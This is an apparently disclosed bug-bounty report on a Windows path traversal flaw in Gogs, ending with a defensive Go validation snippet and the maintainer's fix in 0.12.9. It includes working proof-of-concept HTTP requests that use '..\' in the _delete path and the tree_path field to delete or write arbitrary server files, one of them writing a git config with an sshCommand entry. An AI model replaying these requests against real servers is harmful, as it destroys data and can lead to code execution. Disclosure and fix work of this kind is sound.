Path traversal leads to arbitrary file deletions and file writes in gogs/gogs

Valid

Reported on Jun 2nd 2022


Description

Gogs is deployed and running on Windows.

Proof of Concept

1. Create a repository in Gogs and, through the web page, upload a file named test to it. The content of the file is as follows:

1111

2. The attacker can then delete any file on the server by placing `..\` sequences in the path segment of the _delete request.

http request:

POST /admin1/repo6/_delete/master/..\..\..\../README.md HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

3. The attacker can set tree_path in the _edit request (for example tree_path=..\..\files.txt) to write a file into any directory.

http request:

POST /admin1/repo6/_edit/master/test HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=..\..\..\..\file111&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

Impact

1. Delete arbitrary files on the server, such as gogs/custom/conf/app.ini.

2. Write files to any path on the server.
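As an added example (not code from this report or from the Gogs project), a Go check of the kind that closes this bug class: the user-controlled tree path is normalised with backslashes treated as separators on every OS and rejected when it resolves above the repository root. The repository root used in main is a constructed placeholder.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"path/filepath"
	"strings"
)

// ErrBadTreePath is returned for tree paths that are absolute or that would
// resolve above the repository root.
var ErrBadTreePath = errors.New("tree path escapes repository root")

// CleanTreePath normalises a user-supplied tree path (the tree_path form
// field, or the path segment of a _delete/_edit URL) into a slash-separated
// relative path and rejects anything that climbs above the repository root.
// Backslashes are turned into "/" first: on Windows the filepath package
// treats "\" as a separator anyway, and on Linux (where it does not) doing so
// explicitly makes the check behave the same on both platforms.
func CleanTreePath(treePath string) (string, error) {
	p := strings.ReplaceAll(treePath, "\\", "/")
	if strings.HasPrefix(p, "/") || strings.ContainsRune(p, ':') {
		return "", ErrBadTreePath // absolute path or Windows drive letter
	}
	p = path.Clean(p) // slash-only cleaning, independent of host OS
	if p == "." || p == ".." || strings.HasPrefix(p, "../") {
		return "", ErrBadTreePath // empty path or escapes the root
	}
	return p, nil
}

// RepoFilePath joins a cleaned tree path onto the repository working
// directory and double-checks that the result still lies inside repoRoot.
func RepoFilePath(repoRoot, treePath string) (string, error) {
	clean, err := CleanTreePath(treePath)
	if err != nil {
		return "", err
	}
	full := filepath.Join(repoRoot, filepath.FromSlash(clean))
	rel, err := filepath.Rel(repoRoot, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrBadTreePath
	}
	return full, nil
}

func main() {
	// Constructed inputs: the two traversal strings from the report, a ".."
	// that stays inside the repository, and a plain file name.
	for _, in := range []string{`..\..\..\../README.md`, `..\..\..\..\file111`, "docs/../test", "test"} {
		if out, err := RepoFilePath("/srv/gogs/repos/admin1/repo6", in); err != nil {
			fmt.Printf("%-26q rejected: %v\n", in, err)
		} else {
			fmt.Printf("%-26q -> %s\n", in, out)
		}
	}
}
```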

We are processing your report and will contact the gogs team within 24 hours. a year ago
gogs/gogs maintainer has acknowledged this report a year ago
Joe Chen validated this vulnerability a year ago
1135 has been awarded the disclosure bounty
Joe Chen (Maintainer), a year ago:

Poor Windows...

We have sent a fix follow up to the gogs team. We will try again in 7 days. a year ago
Joe Chen marked this as fixed in 0.12.9 with commit 2ca014 a year ago
This vulnerability will not receive a CVE